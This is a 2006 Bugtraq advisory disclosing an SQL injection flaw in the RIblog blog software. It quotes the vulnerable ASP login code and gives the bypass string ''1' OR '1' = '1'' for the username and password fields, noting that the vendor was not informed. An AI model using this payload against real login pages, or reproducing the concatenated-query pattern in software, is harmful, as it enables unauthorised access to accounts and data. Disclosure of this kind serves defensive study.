Home page logo
/

bugtraq logo Bugtraq mailing list archives

RIblog Remote SQL Injection Exploit
From: omnipresent () email it
Date: 23 Apr 2006 10:32:11 -0000

------------------------------------------------------------------
          - RIblog Remote SQL Injection Exploit -
   -= http://colander.altervista.org/advisory/riblog.txt =-
------------------------------------------------------------------

                        -= RIblog =-



Omnipresent
April 21, 2006


Vunerability(s):
----------------
SQL Injection


Product:
--------
bloggage

Vendor:
--------
http://romedahl.com


Description of product:
-----------------------

It is a Blog.

Not Available Yet.


Vulnerability / Exploit:
------------------------

This software is vulnerable to a Remote SQL Injection.

Take a look of this script in 

[...]

doLogin = Request.Form("login") 'login


If doLogin = "" Then

 Trim(Request.Form("login"))

End If

' Submit to self
If doLogin = "true" Then


                        If sUserName = "" Then
                         sUserName = Trim(Request.Form("UserName"))
                        End If

                        If sPassword = "" Then
                         sPassword = Trim(Request.Form("Password"))
                        End If


                        Set myRecSet = server.createobject("adodb.recordset")
                        strConn = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & strDBPath & ";"
                        Set myConn = server.createobject("adodb.connection")
                        myConn.open strConn

                        strSQL = "SELECT * FROM tUser WHERE  fuser = '"& sUserName  &"' and fpassword = '" & sPassword 
&"';"


[...]

As you can see, the string strSQL is the query passed to the DB. And the variables sUserName and sPassword are not 
properly
sanitised. So, an attacker can exploit this vulnerability by injection SQL Code. Like the example below:

1' OR '1' = '1

The attacker have to put the string above in the username and password fields.


the query will be:

strSQL = "SELECT * FROM tUser WHERE  fuser = '1' OR '1' ='1' and fpassword = '1' OR '1' ='1';

The attacker can gain access to the blog and edit, view comments, etc, etc.


Vendor Status
-------------

Not informed!

Credits:
--------
omnipresent
omnipresent () email it


  By Date           By Thread  

Current thread:
  • RIblog Remote SQL Injection Exploit omnipresent (Apr 24)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault